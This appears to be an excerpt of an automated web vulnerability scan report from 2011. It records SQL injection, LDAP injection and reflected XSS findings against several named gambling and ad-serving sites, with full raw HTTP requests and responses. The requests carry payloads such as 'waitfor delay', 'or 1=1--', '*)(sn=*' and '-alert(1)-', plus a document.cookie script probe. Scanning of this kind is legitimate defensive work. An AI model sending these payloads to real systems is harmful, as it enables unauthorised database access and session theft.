Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:34 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:33 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources''/style.css HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:29:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:35 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 9501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.9. http://scratch.co.uk/resources/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /resources/style.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources/style.css' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:00 GMT; path=/
Content-Type: text/html
Content-Length: 9903

<br />
<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>/home/scratch/public_html/includes/functions.php</b> on line <b>424</b><br />
<!DOCTYPE html P
...[SNIP]...

Request 2

GET /resources/style.css'' HTTP/1.1
Host: scratch.co.uk
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=GBP

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 12:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:03 GMT; path=/
Set-Cookie: neogamesemail=deleted; expires=Sun, 16-May-2010 12:30:02 GMT; path=/
Content-Type: text/html
Content-Length: 9608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

1.10. http://trk.primescratchcards.com/ [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the ac parameter. The application took 21463 milliseconds to respond to the request, compared with 202 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /?ac=51waitfor%20delay'0%3a0%3a20'--&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 531
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=LGFGLCIAIFPMDMCAJENJMCKD; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 51waitfor delay'0:0:20'-- ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Microsoft OLE DB Provid
...[SNIP]...

1.11. http://www.interwetten.org/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.interwetten.org
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6798

<html>
<head>
<title>Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&amp;q='')'.</title>
<style>
body {font-family:"Verdana";font-
...[SNIP]...
</b>System.Data.OleDb.OleDbException: Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&amp;q='')'.<br>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=daqivy3db3w1hk455t45bdvf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hom
...[SNIP]...

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /our-partners

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 45542616%20or%201%3d1--%20 and 45542616%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /our-partners?145542616%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Length: 32146
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td></tr>
                   </table>
               </td>

           </table>
               
       </td></tr>
   </table>
           

</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
Request 2

GET /our-partners?145542616%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Length: 31988
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:36:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>





                       </td></tr>
                   </table>
               </td>

           </table>
               
       </td></tr>
   </table>
           

</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>
1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /outbound/article/www.bet365.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14417416'%20or%201%3d1--%20 and 14417416'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

Request 2

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0


2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /outbound/article/games.bet365.com

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0

Request 2

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)!(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

3. Cross-site scripting (reflected)
There are 469 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecffa'-alert(1)-'64e16de441d was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441d HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:06 GMT
Expires: Mon, 16 May 2011 12:53:06 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441dhttp://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/\">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce96a"-alert(1)-"177f32f4f53 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:02 GMT
Expires: Mon, 16 May 2011 12:53:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53http://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmode = "opaque";

var bg =
...[SNIP]...

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ec69"-alert(1)-"ecd7fe965c6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
